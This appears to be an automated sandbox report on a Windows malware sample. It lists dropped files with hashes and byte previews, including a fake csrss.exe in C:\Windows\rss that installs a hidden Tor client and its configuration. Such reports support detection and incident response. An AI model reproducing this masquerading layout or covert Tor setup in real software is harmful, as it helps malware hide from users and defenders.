                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):960709
                                                          Entropy (8bit):6.030141692420098
                                                          Encrypted:false
                                                          SSDEEP:24576:UzD0YeAxldPO03IIYHpu0FeJ/xpyvpcu1UYahUo24yjFp+PnpFX:6D0neO03ILu08J/nu1UYaio24yjFp+/7
                                                          MD5:D92E59B71BF8A0D827597ED95B2ECA42
                                                          SHA1:CFC49FF29EDDB7127FBED166A8A1E740EA3DFB9A
                                                          SHA-256:B6EF5CB4C093431F3E73C53E66DF33D08237BA46D457D119A2C4DCAE582314E3
                                                          SHA-512:BE65E003A498E753B08912D697E9B4D8A28828581C17D1E8E20880372A81030CE18610EEFF230C8880E68A831041075BB2EBFFCF318D29EBF58BC856FAC3DF04
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!...#..................... .....j......................... .......]....@... ......................p..3@.......>... .......................0..tD...........................M...................... ................................text...............................`.P`.data....,... ......................@.`..rdata.......P.......<..............@.`@/4...........p.......Z..............@.0@.bss....p....`........................`..edata..3@...p...B...F..............@.0@.idata...>.......@..................@.0..CRT....,...........................@.0..tls................................@.0..rsrc........ ......................@.0..reloc..tD...0...F..................@.0B/14.................................@.@B/29.....K...........................@..B/41.....g,..........................@..B/55......x.......z...@..............@..B/67.....8....@..........

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):97293
                                                          Entropy (8bit):5.293554162664098
                                                          Encrypted:false
                                                          SSDEEP:768:NRGwbtFOT3Ro1tpuBNtodXD+H7cK2ULAvU0YVLI4aVeTH9Bve8EuIIRUC:NPbtFOT3RKoBNKN+H7T2U4UaAD9BvZ2C
                                                          MD5:7CDBACA31739500AEFC06DD85A8558FF
                                                          SHA1:ADC36EC6A3CDC7E57A1B706C820E382627F6CB90
                                                          SHA-256:0A1DEE5DD5234971F7526F3D5F8B7E2CFDCB536E18DEBD51C985010FB504FBDB
                                                          SHA-512:6DF8AC9054F27EBBEF9642CE79FF7BA836411EA0ED0BD04B3CFE724A336A91F665C2CC0B7A4BFC99A80786D1A6D361B971A7DBB7A298B919A1BAA812541841BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.....@...............0.....h.....................................@... ......................p..i....................................................................@.......................................................text...X...........................`.P`.data...(....0......."..............@.0..rdata.......@.......$..............@.0@/4......d....P.......*..............@.0@.bss.........`........................0..edata..i....p.......6..............@.0@.idata...............8..............@.0..CRT....,............>..............@.0..tls.................@..............@.0..reloc...............B..............@.0B/14..................F..............@.@B/29......v.......x...J..............@..B/41..........P......................@..B/55.....p....p... ..................@..B/67.....8...........................@.0B/80.....N...............

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):308415
                                                          Entropy (8bit):5.79072242634744
                                                          Encrypted:false
                                                          SSDEEP:6144:eiokqhPm3YvXEXSDYpAHijb6vbhgG4Mlv5FNJ2z+BKTkxde:eikPm3YvXEIYpAHijb6vbhuMd5l2JTkq
                                                          MD5:07F4BBF18077231CB44750684DD8DAF4
                                                          SHA1:8560627E9E05D6022ABDFE7E576856E91AC90188
                                                          SHA-256:4A146671B1FED4906799CB1CFC670753F1B1922793F5B40D5CF710BEFB287316
                                                          SHA-512:04E31AD60E797CDBD1F3DB36A8473139BBD1B763D2D67A160454B24B524E8BBC4D5784C62446A0F9D83B95DD518534AB4581D3A43A14146B17D0035ECC79C151
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........f......!...#.....j.....................d.................................m....@... ..............................0..<....`..P....................p......................................................|1..@............................text............................... .P`.data...H...........................@.0..rdata..............................@.0@/4.......2.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..<....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B/14.................................@.@B/29......v.......x..................@..B/41......9.......:...z..............@..B/55..........P......................@..B/67..................V..

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\state (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (350), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4474
                                                          Entropy (8bit):5.315117333619097
                                                          Encrypted:false
                                                          SSDEEP:48:cJoZBmpEsBwBbf+JyVSZBiDGDu+j4IlqZCplIMblBEYAI9Oxf5:adwBbZSZ4GDuCtuCbIQqcO55
                                                          MD5:019F63C8BEBE11B92621E04908388088
                                                          SHA1:C65EEC30785314FCC0791286CE252B4C26919DBC
                                                          SHA-256:63EDBA6639C862FD5BB76F03BA2D365150CEAD62FC6C357EA952110196C701F8
                                                          SHA-512:FA862B639D637E03C6E39144485454A4A0BB089C4E3A17C592F09DFAD1365977077C001CC80A327CF761693F5A7855A719F75A7F3C7BD61ACC547FA78B550FE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2023-05-28 11:38:34 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 145 1..CircuitBuildTimeBin 165 1..CircuitBuildTimeBin 215 1..CircuitBuildTimeBin 245 1..CircuitBuildTimeBin 255 1..CircuitBuildTimeBin 295 1..CircuitBuildTimeBin 305 2..CircuitBuildTimeBin 345 1..CircuitBuildTimeBin 355 1..CircuitBuildTimeBin 445 1..CircuitBuildTimeBin 455 1..CircuitBuildTimeBin 505 2..CircuitBuildTimeBin 545 2..CircuitBuildTimeBin 645 1..CircuitBuildTimeBin 2655 1..Dormant 0..Guard in=default rsa_id=85C9E4FFF9B69D43CC54FCC706DAC8554C6C9580 nickname=Euphoria sampled_on=2023-05-23T09:52:06 sampled_idx=0 sampled_by=0.4.7.10 listed=1..Guard in=default rsa_id=06BBEAA6F73759A1795EB461D39D2AA168F305D1 nickname=r sampled_on=2023-05-17T12:52:52 sampled_idx=1 sampled_by=0.4.7.10 listed=1 confirmed_on=2023-05-18T02:48:11 confirmed_idx=0 pb_circ_attempts=7.000000 pb_circ_successes=7.000000 pb_successful_circuits_closed=7.

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\state.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (350), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4474
                                                          Entropy (8bit):5.315117333619097
                                                          Encrypted:false
                                                          SSDEEP:48:cJoZBmpEsBwBbf+JyVSZBiDGDu+j4IlqZCplIMblBEYAI9Oxf5:adwBbZSZ4GDuCtuCbIQqcO55
                                                          MD5:019F63C8BEBE11B92621E04908388088
                                                          SHA1:C65EEC30785314FCC0791286CE252B4C26919DBC
                                                          SHA-256:63EDBA6639C862FD5BB76F03BA2D365150CEAD62FC6C357EA952110196C701F8
                                                          SHA-512:FA862B639D637E03C6E39144485454A4A0BB089C4E3A17C592F09DFAD1365977077C001CC80A327CF761693F5A7855A719F75A7F3C7BD61ACC547FA78B550FE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2023-05-28 11:38:34 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 145 1..CircuitBuildTimeBin 165 1..CircuitBuildTimeBin 215 1..CircuitBuildTimeBin 245 1..CircuitBuildTimeBin 255 1..CircuitBuildTimeBin 295 1..CircuitBuildTimeBin 305 2..CircuitBuildTimeBin 345 1..CircuitBuildTimeBin 355 1..CircuitBuildTimeBin 445 1..CircuitBuildTimeBin 455 1..CircuitBuildTimeBin 505 2..CircuitBuildTimeBin 545 2..CircuitBuildTimeBin 645 1..CircuitBuildTimeBin 2655 1..Dormant 0..Guard in=default rsa_id=85C9E4FFF9B69D43CC54FCC706DAC8554C6C9580 nickname=Euphoria sampled_on=2023-05-23T09:52:06 sampled_idx=0 sampled_by=0.4.7.10 listed=1..Guard in=default rsa_id=06BBEAA6F73759A1795EB461D39D2AA168F305D1 nickname=r sampled_on=2023-05-17T12:52:52 sampled_idx=1 sampled_by=0.4.7.10 listed=1 confirmed_on=2023-05-18T02:48:11 confirmed_idx=0 pb_circ_attempts=7.000000 pb_circ_successes=7.000000 pb_successful_circuits_closed=7.

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1097742
                                                          Entropy (8bit):6.448650024927136
                                                          Encrypted:false
                                                          SSDEEP:6144:Or+pcbLisTa5ZhtuDDJhHbexoVNeRWmpVlZL88CAI9ll5K78LUcnRgFDpbV50DEn:JpGUZuIVcl5u8LFRPD+h3CUK94FV4I
                                                          MD5:8A574C633EB3C8B7D209B5940EBF731B
                                                          SHA1:E835C5668AD1437CEBDBD56BC7923C3683E8B9AD
                                                          SHA-256:BFD8DD86A41BC05BEEA0F240C35E88BD42ABADA70EFF4741717901D1B55BFB28
                                                          SHA-512:085EE9D9C52FD5F6FF2095727D9E3B1D27C5B2D3AB54CA11149954A4B031296C9CF9C81457A2DF8EBA916336CDEF4EA2BD39CF98D4AD19AB78E53AC85B6D6DEC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................#..........................@..................................A....@... .................................<................................>..........................$i..........................D............................text...4...........................`.P`.data...$...........................@.`..rdata..4O.......P...t..............@.`@/4..................................@.0@.bss.........p........................`..idata..<........ ...\..............@.0..CRT....0............|..............@.0..tls.................~..............@.0..reloc...>.......@..................@.0B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4466702
                                                          Entropy (8bit):6.437825090947764
                                                          Encrypted:false
                                                          SSDEEP:98304:rEEN8l5RbLMyGPpqrG6qqGJBLQIuSPG3W9tPo:rwl5RbLqpqrGvBLQI+h
                                                          MD5:055AE7C584A7B012955BF5D874F30CFA
                                                          SHA1:F2B4D8C5307FF09607BE929EC08FC2727BF03DCF
                                                          SHA-256:D51B5BF807F6DE3B5521B49B9A722592FB85AEE1EA2F1C03BBB5255D62BFB9C8
                                                          SHA-512:910BB0BE7A3840BB37CB453EA066677A5327E272CFA0995F7A600BD4EB2E7C31685DCC0758C3B2CF07C7622FD45B2D4CDD3A4272CDDAF9E97E2FFC48120646C5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(D............#../..$D..`............0...@...........................D.....4.D...@... ...............................B..6............................B.............................Dm:.....................,.B.(............................text...../......./.................`.P`.data........0......./.............@.`..rdata........0.......0.............@.`@/4.......p....=..r....=.............@.0@.bss....._... B.......................`..idata...6....B..8....A.............@.0..CRT....0.....B......2B.............@.0..tls..........B......4B.............@.0..reloc........B......6B.............@.0B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\unverified-microdesc-consensus (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\unverified-microdesc-consensus.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):138254
                                                          Entropy (8bit):6.395685254326013
                                                          Encrypted:false
                                                          SSDEEP:1536:4Ep67NNeARQDjG1H0ZMnPHTFpl6CkTtWbn5TlE1nvraZrIOkIOWZBXsI7zCzI:4EpOfrRQrczFpqTsb5TlsDanKWZJCU
                                                          MD5:F08B1F044C68770C190DAF1EB1F3157E
                                                          SHA1:F94103A542459D60434F9DDB6B5F45B11EAE2923
                                                          SHA-256:1D0278386F8922BDF4808861E6E901541AD23CC6337BB022C78DC05915202F27
                                                          SHA-512:0667416A7515CD845E96D2AD26CA676CFFD2D1C9F0449FF05455E8CF6A7AB595D3F972785D051F45332C04F1C0B576726F645E3669122608A4F374E984BA161C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.|.........................c......................................@... ......................@.......P..<...............................X...........................$.......................PQ...............................text...dz.......|..................`.P`.data...L...........................@.0..rdata..PD.......F..................@.`@/4.......3.......4..................@.0@.bss....P....0........................`..edata.......@......................@.0@.idata..<....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..rsrc...............................@.0..reloc..X...........................@.0B........................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (307), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5581
                                                          Entropy (8bit):5.079117697870165
                                                          Encrypted:false
                                                          SSDEEP:96:qnGDt8FXxcAoQmc/XCzgvGw0DpNf5yRF0a+P:CF8QmJ/zlNRyRqtP
                                                          MD5:2CB670195F5F3C9E5F3F77C54BE7FD62
                                                          SHA1:3048809C8C71F539BA396485430D4538D64871D3
                                                          SHA-256:CB377CCFCF8A3CB03F8613B6B57C79563F9B75E49D552F8F4542E71851331390
                                                          SHA-512:165B315AE9E047F61F752F3A34717AD32E2E5B4C6BAD90D6183982277D2F3521B8AC143F73DAF47043E74CA4B9D6E3B35133BA50E1C19292924431172E67BB87
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:May 28 11:32:20.000 [notice] Tor 0.4.7.10 (git-f732a91a73be3ca6) opening new log file...May 28 11:32:20.301 [notice] We compiled with OpenSSL 1010111f: OpenSSL 1.1.1q 5 Jul 2022 and we are running with OpenSSL 1010111f: 1.1.1q. These two versions should be binary compatible...May 28 11:32:20.301 [notice] Tor 0.4.7.10 (git-f732a91a73be3ca6) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1q, Zlib 1.2.12, Liblzma N/A, Libzstd N/A and Unknown N/A as libc...May 28 11:32:20.301 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://support.torproject.org/faq/staying-anonymous/..May 28 11:32:20.408 [notice] Read configuration file "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc"...May 28 11:32:20.408 [warn] ControlPort is open, but no authentication method has been configured. This means that any program on your computer can reconfigure your Tor. That's bad! You should upgrade your Tor controller as soon as possible...May 28 11:32:20

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\torrc

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):230
                                                          Entropy (8bit):4.693556260377232
                                                          Encrypted:false
                                                          SSDEEP:6:cAiICN23fUKv21MRtSg1CN23fUKb3Tc1CN23fUKT:xBy1Qt/X7cXX
                                                          MD5:FC386F22CDDFD15CD40FAF7BD4653362
                                                          SHA1:E14C1A1381C49F494094E284C34063BDD1192E31
                                                          SHA-256:CC4B3D671F34CFBD28310B5C566E345EB68E37A59666346EF33B11BFFFBC832D
                                                          SHA-512:60EB04276262913FE7CD1EF1475F3E014468EA554FE2145AEE483584BC383896048E511614C907CE920D8BA70608562AEEABB650198C3C452FF1E37D1A84B5DD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:DataDirectory C:\Users\user\AppData\Local\Temp\csrss\tor\Tor.SOCKSPort 31464.ControlPort 31465.GeoIPFile C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip.GeoIPv6File C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip6.

                                                          C:\Windows\Logs\CBS\CBS.log

                                                          Download File
                                                          Process:C:\Windows\servicing\TrustedInstaller.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8141793647547125
                                                          Encrypted:false
                                                          SSDEEP:96:2qsFXipHl+AVsgfiRqsdv6hnVW4NsIf6qlQsgP9wN0V/s5fR:2vg9QfgKRvA1AvISqzw2x5p
                                                          MD5:34C621CCAB26FF3DD9DAD0E80D11AA2A
                                                          SHA1:34250969F4620DD680835BD36135207A0906F462
                                                          SHA-256:82FE5086DFFA83B0ED218DA9523E5BDC5D4DE96D6800A8187FCB0DFDE069E648
                                                          SHA-512:8ED95F260379E524706B938FD34B66589A2C48C86EEB1D94FC5413D91B5927F8B09E720F7A6999FFE596850A859F8807850245A5848BA304EAACC561BBC4C4C3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.2023-05-28 11:29:51, Info CBS TI: --- Initializing Trusted Installer ---..2023-05-28 11:29:51, Info CBS TI: Last boot time: 2023-05-28 05:43:16.500..2023-05-28 11:29:51, Info CBS Starting TrustedInstaller initialization...2023-05-28 11:29:51, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2023-05-28 11:29:51, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2023-05-28 11:29:51, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2023-05-28 11:29:51, Info CBS Ending TrustedInstaller initialization...2023-05-28 11:29:51, Info CBS Starting the TrustedInstaller main loop...2023-05-28 11:29:51, Info CBS TrustedInstaller service starts successfully...2023-05-28 11:29:51, Info CBS No startup pr

                                                          C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2148
                                                          Entropy (8bit):5.3400757759041335
                                                          Encrypted:false
                                                          SSDEEP:48:MbWSGfs4c4RQmFoUefamfgZ9tK8NPb17Iu1iMutgyV/gXJvUyTHc:CLGHcIFKLfbIZ2KRLum18
                                                          MD5:FD91683545A90147BD479AA5BCB80815
                                                          SHA1:153A88EF0D65FC3FD47EDEB50027CF3AD63950E5
                                                          SHA-256:65E55E07D42537DD3B1DCB9AA678B06CA98C298120F7D26DBEC0110EC60307F5
                                                          SHA-512:ADE13865FF2751CB80C069FE8390CC637F81B6DBE712A3483E376865A1CA3AEC0DFD094679568910759B69D42A0129BD9A3B646014ABC88393D06FDCAA141AB5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e.......................\.[.[...............................P................1]...E.....^.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                          C:\Windows\Temp\__PSScriptPolicyTest_1ewy3cvt.jss.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_1od21bnc.bfu.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_21wsrwkm.diw.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_3rofccwi.uii.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_4de0bier.p14.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_4s3rvv3n.rtg.ps1

                                                          Download File
